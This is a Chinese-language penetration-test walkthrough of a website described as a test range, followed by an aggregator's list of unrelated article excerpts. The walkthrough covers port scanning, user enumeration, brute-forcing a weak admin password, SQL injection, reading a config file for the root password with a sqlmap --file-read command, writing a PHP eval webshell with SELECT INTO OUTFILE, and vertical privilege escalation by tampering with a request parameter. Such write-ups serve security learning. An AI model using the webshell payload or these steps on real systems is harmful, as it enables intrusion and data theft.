【滲透過程】嘉緣網站 --測試

聲明:本片文章測試網站為測試靶場

?

信息收集階段:

首先使用了一些常見的掃描工具:nmap? 御劍

使用nmap掃描端口 發現網站開放了 135 139 445 3306 等端口

這里可以看到網站開放了一些危害較高端口:135 225等

使用御劍掃描到一些敏感信息:phpinfo頁面? 后臺登錄地址

?

可以從info頁面直接看到網站的配置信息:網站絕對路徑

當訪問IP+80端口發現有探針,可從中看出網站的中間件等信息

(這里的phpmyadmin管理無法打開)

?

測試階段:

信息收集完成后開始進一步測試

針對網站進行手工測試

在用戶登錄處發現,該網站沒有對登錄進行嚴格限制,而且可以通過返回錯誤信息發現網站存在哪些用戶

根據返回信息可以發現網站有admin用戶,嘗試使用暴力破解

使用工具:BurpSuite

對用戶名為admin的用戶進行暴力破解 密碼為弱口令 ,可以登錄用戶

繼續測試發現網站存在SQL注入

嘗試使用工具進行注入檢測

使用工具:sqlmap

經過注入發現網站后臺的用戶名及密碼 ,phpmyadmin的用戶及密碼

密碼為密文,嘗試解密發現只有data 和kefu用戶可以解開

在注入時發現我們的權限可以進行讀文件但是不可寫,嘗試通過讀取配置文件獲取root密碼

讀取文件需要網站絕對路勁,這是我們可以訪問之前的info頁面,獲取絕對路徑

嘗試使用sqlmap進行讀取文件 ,成功讀取到root密碼 (但是沒有發現phpmyadmin的頁面)

sqlmap -u "注入點的URL"  --file-read =“網站絕對路徑/讀取的文件“

?

在前端無法和會員登錄后無法找到漏洞,嘗試登陸后臺繼續測試

在使用data用戶登錄后發現為普通權限

在后臺對每項功能進行測試發現有一個執行sql語句的模塊

嘗試使用sql語句進行寫入一句話,發現寫入成功

select "<?php eval($_POST[apple]);?>" into outfile "網站絕對路徑/1.php"  //1.php 為寫入一句話木馬的文件名

?

在發現自己權限普通權限,嘗試通過抓包獲取包信息,發現存在越權漏洞(垂直)

使用工具:burp

通過burp抓取添加管理員的包,修改fr_admin_type=manage? 發現成功添加超級管理員

?

?

使用菜刀(蟻劍)連接寫入的一句話

?

?

下篇

【提權過程】嘉緣網站--代理,提權 https://www.cnblogs.com/G-Shadow/p/10965035.html

轉載于:https://www.cnblogs.com/G-Shadow/p/10964374.html

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/277604.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/277604.shtml
英文地址,請注明出處:http://en.pswp.cn/news/277604.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

C編程經驗總結

Turbo c Return (z);return z; 圖形界面的有scanf(“%d ~%d\n”,&~,&~);注意&#xff1a;中間不能有亂的東西 Printf(“~~~ %d~~%d\n”,~,~);這兒可以有亂的東西&#xff0c;一切的提示圖形界面多是由它完成 函數&#xff0c;變量一定是有類型 除了函數&#xff08;&am…

文檔過期打不開怎么辦_標準的產品需求文檔在這里!(詳細說明版)(2)

接著上篇繼續寫&#xff0c;上篇請點擊標準的產品需求文檔在這里&#xff01;(詳細說明版)(1)入口已經寫完&#xff0c;讀此文檔的無論是研發人員還是測試都已經知曉此需求需要做的從哪里進入&#xff0c;接下來就是主菜了&#xff0c;進入以后該干嘛。進入以后當然就是新的頁面…

day32

udp(用戶數據包協議) 高并發(同時有大量客戶端訪問服務器,服務器處理不過來)?OSI模型中,屬于傳輸層得協議,僅用于不要求可靠性,以及不要求分組順序且數據量較小的簡單傳輸,力求快?通訊流程類似對講機 只管發送不管對方是否接收到,甚至不關心對方存在?UDP可以處理多個客戶端,…

Macbook全系列詳細分析及購機指南

時至今日&#xff0c;極佳的用戶體驗、強大的功能、獨特的設計感、廣闊的市場和無可比擬的品牌魅力已經讓蘋果公司各種電子產品的迅速普及&#xff0c;其中Macbook逐漸被越來越多的人所青睞&#xff0c;尤其是從事一些特定行業的工作者&#xff08;比如IT、電信、互聯網以及藝術…

惠普m1005連接電腦步驟_電腦連接電視機詳細步驟方法圖文

電腦連接電視機有什么好處呢&#xff1f;小編想到了幾點&#xff0c;那就是屏幕大&#xff0c;而且可以在電視機上使用網絡看到自己想看的劇。還有就是可以更多的人一起做著來看。所以總的來說電腦連接電視機還是好處比較多的。下面我就來告訴你們電腦怎么連接電視機。有的時候…

對程序實施精準手術!阿里安全獵戶座實驗室首創“自動逆向機器人”

近日舉辦的看雪安全開發者峰會上&#xff0c;阿里安全獵戶座實驗室首度向外界展示了最新的研究成果——“自動逆向機器人”。該機器人可以像醫生一樣“望聞問切”&#xff0c;對程序進行顯微鏡級別的勘察&#xff0c;并完整“回放”其運作過程&#xff0c;因此&#xff0c;可以…

(24) 不可能的出棧順序

一、問題描述 給定兩個數組&#xff0c;一個進棧順序&#xff0c;一個出棧順序。判定出棧數組的出棧順序是不是有可能的。 二、Code 1 package algorithm;2 3 import java.util.ArrayDeque;4 import java.util.Deque;5 6 /**7 * Created by adrian.wu on 2019/5/30.8 */9 pub…

《魔獸世界》的魅力究竟在哪兒?

寫在前面&#xff1a;《魔獸世界》&#xff08;World of Warcraft&#xff0c;后面簡稱WOW&#xff09;&#xff0c;是由暴雪開發的一款大型角色扮演網絡游戲&#xff0c;曾經付費的正式用戶一度超過1150萬人&#xff0c;覆蓋244個國家和地區&#xff0c;是曾經的“世界第一網游…

Service Mesh所應對的8項挑戰

2019獨角獸企業重金招聘Python工程師標準>>> Lori Macvittie 微服務架構是把雙刃劍&#xff0c;我們享受它帶來的開發速度&#xff08;development velocity&#xff09;&#xff0c;卻也不得不面對服務間通訊帶來的復雜性問題。 目前大多數擴展容器化微服務的架構多…

stm32cubeide外部中斷_【STM32】HAL庫 STM32CubeMX教程三----外部中斷(HAL庫GPIO講解)

前言上一節我們講解了STM32CubeMX的基本使用和工程的配置&#xff0c;那么這一節我們正式來學習CubeMX配置STM32的各個外設功能了今天我們會詳細的帶你學習STM32CubeMX配置外部中斷&#xff0c;并且講解HAL庫的GPIO的各種函數&#xff0c;帶你學習不一樣的STM32那么話不多說&am…

html5兼容ie

https://www.jb51.net/html5/143049.html轉載于:https://www.cnblogs.com/rivsidn/p/10913532.html

什么叫內部銀團_什么是紫鈦晶?紫鈦晶是不是天然水晶?

都說紫鈦晶是紫水晶與鈦晶的結合&#xff0c;聽上去好像這種水晶不是天然的&#xff0c;像是人工合成的&#xff0c;事實上并非如此&#xff0c;紫鈦晶也是天然形成的水晶&#xff0c;由于內部的包裹體是金色的&#xff0c;因此被稱為紫鈦晶。和菩心晶舍家的晶舞傾城一起了解紫…

如何使用Squid服務來構建=》傳統和透明代理服務器,通俗易懂!

1、緩存代理概述&#xff1a; 作為應用層的代理服務軟件&#xff0c;Squid主要提供緩存加速和應用層過濾控制的功能 2、代理的工作機制&#xff1a; &#xff08;1&#xff09;當客戶機通過代理來請求web頁面時&#xff0c;指定的代理服務器會先檢查自己的緩存&#xff0c;若緩…

排序算法-C++實現

#include <iostream>using namespace std;void show(int M[], int n) {for(int i0; i<n; i)cout<<M[i]<<" ";cout<<endl; }//快速排序 void quick_sort(int M[], int left, int right) {if(left < right){int i,j,x;i left;j right;…

Bootstrap開發框架視頻整理

最近到客戶處進行實地培訓&#xff0c;整理了很多培訓的材料&#xff0c;現將它們錄制相關主題的視頻&#xff0c;作為我的Bootstrap開發框架的知識補充&#xff0c;希望給感興趣的朋友進行了解。培訓內容主要包括基礎框架部分、MVC框架部分、Bootstrap框架部分、Bootstrap重要…

安卓隨機通話記錄_Android 通話記錄

查詢通話記錄private static final String[] CALLLOGS_PROJECTION new String[]{CallLog.Calls._ID,CallLog.Calls.CACHED_NAME, CallLog.Calls.NUMBER, CallLog.Calls.TYPE, CallLog.Calls.DATE,CallLog.Calls.DURATION};/*** * 概述&#xff1a;獲取最近10條通話記錄 */publ…

【c基礎】入門語法

%d:占位符 表示要輸出一個整形數。 %f:為float 浮點數 %lf:為double型 雙精度浮點數 \n:換行 const:定義一個常量,一旦被初始化就不能修改&#xff0c;只讀的變量&#xff08;read-only variable&#xff09;。 整數運算 的結果是整數 如果有小數就拋棄沒有考慮四舍五入。 一&a…

vue的移動app項目中,自定義拖拽指令的問題

使用vue的都知道vue有一個自定義指令&#xff0c;我比較喜歡的就是拖拽的自定義指令&#xff0c;感覺挺方便的&#xff01; //組件內的拖拽指令 directives: {//組建內自定義指令drag: {// 指令的定義bind: function(el, value) {let oDiv el; //當前元素let self this; //上…

彈窗php整人_[整人小程序] 超級信息框(無限彈窗++)

該樓層疑似違規已被系統折疊 隱藏此樓查看此樓貌似剛才縮進空格被吞了&#xff0c;再發一次Set FSO  createobject("scripting.filesystemobject")Set ws  Createobject("Wscript.shell")Set SA  CreateObject("Shell.Application")If …

day22 Java學習 IO流(序列流)

IO流&#xff08;序列流&#xff09; 序列流&#xff1a; * 可以把多個字節輸入流整合成一個&#xff0c;從序列流中讀取數據時&#xff0c;將從被整合的第一個流開始讀&#xff0c;讀完一個之后繼續讀第二個。 整合方式&#xff1a; * Seq uenceInputStream ( InputStream &am…